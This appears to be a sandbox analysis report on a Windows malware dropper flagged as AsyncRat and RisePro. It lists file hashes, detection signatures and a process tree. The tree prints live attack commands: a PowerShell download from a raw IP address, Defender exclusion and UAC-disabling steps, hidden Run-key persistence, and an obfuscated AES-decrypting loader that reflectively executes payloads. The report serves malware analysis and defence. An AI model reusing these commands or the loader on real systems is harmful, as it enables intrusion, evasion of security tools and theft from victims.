SHA256 513947bac118c71c5ca2acda240320e971749725c47c7b241339925fd37f5343
SHA512 5af6bbb92a7ade69bdbd0badbfd5f5c1f01cb45e2442268429694a23cfa123dfe31d86246718ec0afd0ade7a0928a10540ed6be7d2c9b7daf1f97462b40c0613

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d39cd378-2e9d-40c3-829b-10dbc70ae7ba.dmp

MD5 272134cd5794aca913fcd0aa0f11432b
SHA1 b74835bc19d3025e0c25e949da26db65fae379d1
SHA256 6f44f0eccb0b6d1a83cbd398252afaf7ff4bd3fdb936938523f99c53cdcaa54b
SHA512 873b9a04c6b0fce7bdffab076db7f708b547ea7adc930805a512ab469eea9a30a880e589a64d6eaae9ff11401eb82a05c3170a6eed4062addc3d96447642325f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\watson_metadata

MD5 50c3824a5ce311fb8de489d2c906722b
SHA1 646701304da4d5055030dea7c4db4166ea8b125b
SHA256 ec26cd69fafae4bfd96c6bc6f92b65dcb83d6434cdddd77cdcf1d33d9f1f3c3d
SHA512 32e1e36bb4313995c880eaf6344717898417809f1b1ee7b95612157bfb7aee2c223dcc28a3c37e4460e42703b21c4804faecfb8a0b8da4013a4f1a53f7d1665b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 018d785f203acfd90f73467bb56b535f
SHA1 182cd16fd122fc520dcd92fd77b14acc42e620ab
SHA256 2d39371ce46c3daacf146ecc00b9348c620f21002d729048f53f6b3a1c67e1a9
SHA512 7cef83a5ceb9cc276b49bacf3e52b93dcda717a18588f13435931b1374893542d0157b8735c0ffcdee02e74c1d73150f7f41d0e55a1925ad1fcb51dd0b3691c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\968cba5e-556a-45e9-afbe-c33e1877f79e.dmp

MD5 1eccdc25907111a2f957581b2ecba0b9
SHA1 ac95bbcd7c8f80b961ebe5b9a5c6ae0c6fb350db
SHA256 f13d138a4492b54358c1678ba4e0327e05248cf0b0bf5e27aba931dcd57f8bf3
SHA512 722c63667afe0d85bf18dbef89b92771b315368f1bf969ddedd1788c99c1a3efe90c87106936a453ca54e121240985135eb75b6c7488eca8d76293466ad53209

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\50b43453-f262-471a-96c6-9c9f4e273331.dmp

MD5 4a4d948c7e58b8ab44ec3c8185d6b9f4
SHA1 581e7b21b8bcd3f8727f33bf2aed152e98957eec
SHA256 2ae2be26fe6b4e9698420ac43d741b096f2a06c8b1f45b013f9b7bab68c6733c
SHA512 c0df4c9336811299a5416af16b9336f383e488727a36897cb1b6008173095c69b344b92a89efc61be6e8865aeff99e8a400330375a979a57e3ae62a6d6140cd2

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-01 15:54
Reported 2024-06-01 16:36
Platform win10v2004-20240508-en
Max time kernel 102s
Max time network 106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

Signatures

AsyncRat

rat asyncrat

RisePro

stealer risepro

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\volumeinfo.exe'\"" C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\victor.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
PID 1332 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1332 wrote to memory of 5488 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\New.exe
PID 1332 wrote to memory of 5488 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\New.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1912 wrote to memory of 5508 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1912 wrote to memory of 5508 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 5808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
PID 1912 wrote to memory of 5808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
PID 5488 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5488 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2192 wrote to memory of 6132 N/A C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2192 wrote to memory of 6132 N/A C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 3212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 3212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\a\New.exe

"C:\Users\Admin\AppData\Local\Temp\a\New.exe"

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4804,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5448,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5760,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sxznnh.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\sxznnh.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe

"C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"

C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp" /SL5="$202C8,18247052,1148416,C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"

C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe

"C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe"

C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe

